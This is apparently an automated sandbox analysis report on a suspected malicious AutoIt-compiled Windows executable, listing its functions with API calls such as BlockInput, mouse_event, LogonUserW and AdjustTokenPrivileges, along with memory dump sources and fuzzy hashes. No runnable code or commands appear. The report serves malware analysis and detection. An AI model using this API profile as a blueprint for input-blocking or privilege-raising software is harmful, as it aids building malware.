                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                    • Instruction ID: 5b3ae2fb1a36a958ff301b05f6ba9524a58c0d732b92dca7c456c439a8f4c301
                    • Opcode Fuzzy Hash: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                    • Instruction Fuzzy Hash: B7F03C75A11208BBDB04DFE09C89AADBBB8EB08201F408469E502E2281D6745A048B54
                    Function 0075E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e48afb324070f6aaa52e729ab3bf1f3acce9af74746ab78f75c321fb7c50595
                    • Instruction ID: 8f4bbfc3af5b809020024e5dd54899dc5e60e27ee76123f58f7ebcbe1d4df031
                    • Opcode Fuzzy Hash: 9e48afb324070f6aaa52e729ab3bf1f3acce9af74746ab78f75c321fb7c50595
                    • Instruction Fuzzy Hash: 8B229E70A00219DFDB28DF58C484AEEB7F1FF04311F148469ED569B341E7B8AA89CB91
                    Function 007BC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007BC966
                    • FindClose.KERNEL32(00000000), ref: 007BC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                    • Instruction ID: f3512af76273ee4b9ce347621bb80cf941ba3380a97b310e99903a0afefe3b05
                    • Opcode Fuzzy Hash: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                    • Instruction Fuzzy Hash: 8A1170316002009FDB109F29C849A6AB7E9EF84321F04C51EF9A6D7291DB74A804CB91
                    Function 007BA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                    • Instruction ID: 47288ad3318cf9b3c08248321345b114941cb7cf1307b7350ee4ca922a5f1580
                    • Opcode Fuzzy Hash: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                    • Instruction Fuzzy Hash: BBF0E23154522DFBDB20AFA4CC48FEA776DBF08361F008166F809D3180D6349900CBA1
                    Function 007A8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                    • CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: a2ba18ee05c5bbadd989695f408c6b5296f5137e90cfabeeeb5504a6baac5c85
                    • Instruction ID: 9948efb9c09789caa1976f2674ceaa6bb6c3a757ee74393f2941002b765b6e7d
                    • Opcode Fuzzy Hash: a2ba18ee05c5bbadd989695f408c6b5296f5137e90cfabeeeb5504a6baac5c85
                    • Instruction Fuzzy Hash: 8EE0B676011610EEEB252B64ED09D777BE9EB04394724C92AF49A80470DB66AC90DB10
                    Function 0077A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778F97,?,?,?,00000001), ref: 0077A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                    • Instruction ID: 723b5d1694736db26958cb6d26c585ab0e301c97f4adf93a1d29c4041af5661e
                    • Opcode Fuzzy Hash: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                    • Instruction Fuzzy Hash: 3FB09231055208ABCA002B95EC09B883F78EB44AA2F41C022F60E84060CB6654508A99
                    Function 0077F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                    • Instruction ID: 99430774f6c5e995d254604dba2c416c5fe82d8652e4ae1db7b4e3e3cf35e405
                    • Opcode Fuzzy Hash: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                    • Instruction Fuzzy Hash: 80324662D2AF814DDB279634DD72335A248AFBB3C4F15D737E819B99A6EB2CC4834104
                    Function 0078267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                    • Instruction ID: 51c7d6bf859f76333ce1ebde78032a14419ffb75d0a0577cdea1f6bfbcbf912c
                    • Opcode Fuzzy Hash: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                    • Instruction Fuzzy Hash: A1B10120D2AF814DD723A6398871336BB4CAFBB2C5F52D71BFC1678D62EB2595834241
                    Function 007B8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 007B8B25
                      • Part of subcall function 0077543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B91F8,00000000,?,?,?,?,007B93A9,00000000,?), ref: 00775443
                      • Part of subcall function 0077543A: __aulldiv.LIBCMT ref: 00775463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                    • Instruction ID: a4f51b083b13fb00dd3338a3dbafc2a415327dd27c9d9538c28be5aef3b48c7c
                    • Opcode Fuzzy Hash: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                    • Instruction Fuzzy Hash: CC21A272625510CBC729CF39D441B92B3E5EFA5311B288E6CD1E5CB2D0CA74B945CB94
                    Function 007C41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 007C4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                    • Instruction ID: f25e12a49d3109e4e4794ddd70f5f8456b82bf89a5164d1b0120c00e55cec97e
                    • Opcode Fuzzy Hash: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                    • Instruction Fuzzy Hash: 8CE01A312402149FC710AF69D845E9AB7E8AF94761F00802AFD4AD7252DAB8EC448BA0
                    Function 007B4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007B4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                    • Instruction ID: 5e92acceb992b5832d6c9aae0b6e0c2f5411d50a0ad1bc1f4f723b803e2f2196
                    • Opcode Fuzzy Hash: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                    • Instruction Fuzzy Hash: 11D09EB41646057DFC184F20AC1FFF61219E340791F9C99897202975C398EDA850A035
                    Function 007A8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A88D1), ref: 007A8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                    • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                    • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                    • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                    Function 00792230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00792242
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                    • Instruction ID: 1241e8f3589548e57956a96e004e33970ba1c00c6555140319aa5e2dcd4dbb7d
                    • Opcode Fuzzy Hash: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                    • Instruction Fuzzy Hash: DEC04CF1801109DBDB05DB90D988DFE77BCAB04304F104056E142F2100D7789B448A71
                    Function 0077A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                    • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                    • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                    • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                    Function 00768A0E Relevance: .6, Instructions: 608COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                    • Instruction ID: a2a2225215214c7a9b92a0fabe720e89596c33d2e80138d09aabfa90753c6567
                    • Opcode Fuzzy Hash: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                    • Instruction Fuzzy Hash: 56223970A01615CBDF688F24C49467D77A1FB82304F6887AADC579B291EB3C9D81CB72
                    Function 00772405 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: d262c96590bf8bd5206a3f2133eec8801aa44f2a1891e442f81f60ba7efc6b3e
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 2FC1C4322061930ADF2D4A3D943503EBAE15EA27F135A8B5DE4BBCB4C5EF28D525D720
                    Function 0077283A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 468aa242a37ea7c9dbc16326b1b1af8f29312825a6a4f0692cbc85e7f29753ec
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 7EC1E53220519309DF2D4A3E843003EBBE15BA27F135A8B6DE4BADB1D5EF28D525D720
                    Function 00771BB8 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 58dbc2762a7282d2135135d1f1f1a01be0815db9c484ea9573882629c6e9efc5
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 93C1963220619309DF2D4A3D943503EBBE15AA27F139A8B6DE4BBCB5C4EF18D524D720
                    Function 007C7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007C7B70
                    • DeleteObject.GDI32(00000000), ref: 007C7B82
                    • DestroyWindow.USER32 ref: 007C7B90
                    • GetDesktopWindow.USER32 ref: 007C7BAA
                    • GetWindowRect.USER32(00000000), ref: 007C7BB1
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C7CF2
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C7D02
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D4A
                    • GetClientRect.USER32(00000000,?), ref: 007C7D56
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7D90
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DB2
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DC5
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD0
                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD9
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DE8
                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF1
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF8
                    • GlobalFree.KERNEL32(00000000), ref: 007C7E03
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7E15
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7E2B
                    • GlobalFree.KERNEL32(00000000), ref: 007C7E3B
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7E61
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7E80
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7EA2
